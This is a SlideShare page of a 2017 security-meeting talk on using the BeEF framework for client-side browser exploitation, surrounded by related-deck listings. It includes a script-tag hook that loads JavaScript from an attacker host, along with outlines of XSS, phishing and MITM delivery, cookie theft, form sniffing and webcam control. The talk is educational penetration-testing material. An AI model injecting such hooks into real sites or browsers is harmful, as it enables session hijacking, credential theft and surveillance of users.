SlideShare une entreprise Scribd logo

Advanced Client Side Exploitation Using BeEF

Télécharger en tant que PPTX, PDF
1
1N3

Q2 2017 Phoenix ISSA Chapter Meeting - 04/11/2017

Technologie
1  sur  39
Man In The Browser Advanced Client-Side Exploitation with BeEF 1N3 | @CrowdShield | https://crowdshield.com ISSA Phoenix Chapter, 04/11/2017
Introduction • Sr. Penetration Tester at Early Warning • 16+ years of IT experience with a heavy focus on IT Security • Symantec/NYS Cyber Security Agency, nCircle/Tripwire, General Electric • Degree in Computer Science • OSCP, ASFP, CISSP, PCI-ASV, Security+, Network+, A+, MCP, CNA • Bug Bounty Researcher on BugCrowd and HackerOne • Founder of CrowdShield (@CrowdShield) https://crowdshield.com
Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
Logging In…
Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
XHR Polling
Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
Social Engineering Toolkit • Customized payload generation • Website Cloning • Email Template Generation • Mass Email Capabilities
Phishing & Social Engineering It only takes one wrong click…
Open Redirect
XSS Hooking BeeF hook.js injected via URL
URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
• Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
BeEF Modules
BeEF Basics
Browser Hacking Methodology • Gaining control • Fingerprinting • Retain control • Bypassing SOP • Attacking users • Attacking extensions • Attacking web applications • Attacking browsers • Attacking plugins • Attacking networks
Fingerprinting REQ-PEN-1234
Retain Control
Attacking Users Session Hijacking
Form Sniffing
Webcam Control
Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
CSRF Exploits
Tunneling Proxy
Internal Network Mapping
Integration • Execute Metasploit exploits directly through BeeF’s web UI… • Get Metasploit DB user/pass: msfconsole -x ‘load msgrpc;’ • Update Config with MSF DB user/pass: /usr/share/beef-xss/extensions/metasploit/config.yml • Enable the Metasploit module in BeeF config: /usr/share/beef-xss/config.yml
Exploits…
Exploiting Browsers Using Java
Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
Demo
Recommended Reading
Questions?

Recommandé

BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationSukhpreet Singh
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityAbdul Wahid
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Xss ppt
Xss pptXss ppt
Xss pptpenetration Tester
 
Denial of Service Attack
Denial of Service AttackDenial of Service Attack
Denial of Service AttackDhrumil Panchal
 

Recommandé

BeEF
BeEFBeEF
BeEFAlexandraLacatus
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Attack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationAttack and Mitigation for Insecure Deserialization
Attack and Mitigation for Insecure DeserializationSukhpreet Singh
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityAbdul Wahid
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Xss ppt
Xss pptXss ppt
Xss pptpenetration Tester
 
Denial of Service Attack
Denial of Service AttackDenial of Service Attack
Denial of Service AttackDhrumil Panchal
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
Denial of service
Denial of serviceDenial of service
Denial of servicegarishma bhatia
 
Sql injection
Sql injectionSql injection
Sql injectionManjushree Mashal
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsAdeel Javaid
 
Broken access controls
Broken access controlsBroken access controls
Broken access controlsAkansha Kesharwani
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0Q Fadlan
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
EC-Council Certified Network Defender
EC-Council Certified Network DefenderEC-Council Certified Network Defender
EC-Council Certified Network DefenderITpreneurs
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
Keyloggers and Spywares
Keyloggers and SpywaresKeyloggers and Spywares
Keyloggers and SpywaresAnkit Mistry
 
Beef saurabh
Beef saurabhBeef saurabh
Beef saurabhSaurav Chaudhary
 
Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Joe Ferguson
 

Contenu connexe

Tendances

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsAdeel Javaid
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0Q Fadlan
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
EC-Council Certified Network Defender
EC-Council Certified Network DefenderEC-Council Certified Network Defender
EC-Council Certified Network DefenderITpreneurs
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
Keyloggers and Spywares
Keyloggers and SpywaresKeyloggers and Spywares
Keyloggers and SpywaresAnkit Mistry
 

Tendances (20)

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
Denial of service
Denial of serviceDenial of service
Denial of service
 
Sql injection
Sql injectionSql injection
Sql injection
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
 
Broken access controls
Broken access controlsBroken access controls
Broken access controls
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Sql injection
Sql injectionSql injection
Sql injection
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
EC-Council Certified Network Defender
EC-Council Certified Network DefenderEC-Council Certified Network Defender
EC-Council Certified Network Defender
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Keyloggers and Spywares
Keyloggers and SpywaresKeyloggers and Spywares
Keyloggers and Spywares
 

Similaire à Advanced Client Side Exploitation Using BeEF

Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Joe Ferguson
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar GanievOWASP Russia
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfnanangAris1
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)Sam Bowne
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesVi Tính Hoàng Nam
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingHeba Hamdy Farahat
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)Wail Hassan
 

Similaire à Advanced Client Side Exploitation Using BeEF (20)

Beef saurabh
Beef saurabhBeef saurabh
Beef saurabh
 
Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
Web application security
Web application securityWeb application security
Web application security
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdf
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF Training
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)
 

Dernier

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 

Dernier (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 

Advanced Client Side Exploitation Using BeEF

  • 1. Man In The Browser Advanced Client-Side Exploitation with BeEF 1N3 | @CrowdShield | https://crowdshield.com ISSA Phoenix Chapter, 04/11/2017
  • 2. Introduction • Sr. Penetration Tester at Early Warning • 16+ years of IT experience with a heavy focus on IT Security • Symantec/NYS Cyber Security Agency, nCircle/Tripwire, General Electric • Degree in Computer Science • OSCP, ASFP, CISSP, PCI-ASV, Security+, Network+, A+, MCP, CNA • Bug Bounty Researcher on BugCrowd and HackerOne • Founder of CrowdShield (@CrowdShield) https://crowdshield.com
  • 3. Overview • What is BeEF? • Getting started • Browser hooking • Attack vectors/exploits & examples • Demo • Q & A
  • 4. What is BeEF? • Short for “Browser Exploitation Framework” • At a basic level, it allows an attacker to control a victims browser • Similar to Metasploit (modular exploit framework) but for exploiting browsers • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.) • In some cases, it can lead to full compromise of the victims PC
  • 5. Getting Started • Installed by default on Kali Linux • Can also be downloaded from http://beefproject.com/ • App directory /usr/share/beef-xss/ • Startup script /etc/init.d/beef-xss <start|stop> • Web UI http://localhost:3000/ui/panel/ • Default user/pass: beef/beef
  • 7. Hooking Browsers • Must be able to inject Javascript in target’s browser • <script src=“http://attackerip:3000/hook.js”></script> • Uses XHR (mostly transparent) polling to communicate with BeEF server
  • 9. Fundamentals • Cross-Site Scripting (XSS) allows arbitrary execution of client side code (ie. Javascript/HTML, etc.). Usually used by attackers to steal session cookies… • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (ie. Submitting a form to transfer funds $1,000 to an attackers account, etc.)
  • 10. Attack Vectors • Social Engineering/Phishing - Lure or convince victim to attacker controlled server hosting BeeF • Open Redirect - Redirect victims automatically to attacker controlled server hosting BeeF • Reflected XSS - Send victim a URL that executes hook.js script • Stored XSS - Embed hook.js script via a stored XSS vector • Man-In-The-Middle Attacks - Injecting BeEF hook via MITM
  • 11. Social Engineering Toolkit • Customized payload generation • Website Cloning • Email Template Generation • Mass Email Capabilities
  • 12. Phishing & Social Engineering It only takes one wrong click…
  • 14. XSS Hooking BeeF hook.js injected via URL
  • 15. URL Obfuscation Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
  • 16. Stored XSS A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
  • 17. Man-In-The-Middle Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing as well…
  • 18. Web UI Tracks client connections (ie. hooked browsers) and allows an attacker to run modules
  • 19. • Gather intel on target system/browser • Retrieve session cookies • Redirect target to malicious URL’s • Change site content • Form field sniffing • Embed hidden iframes • Alter original page content (HTML/JS) • Scan internal network (ping/port scans) • Launch CSRF attacks • Execute client-side exploits/code (BeeF/Metasploit/SET) BeeF Attacks
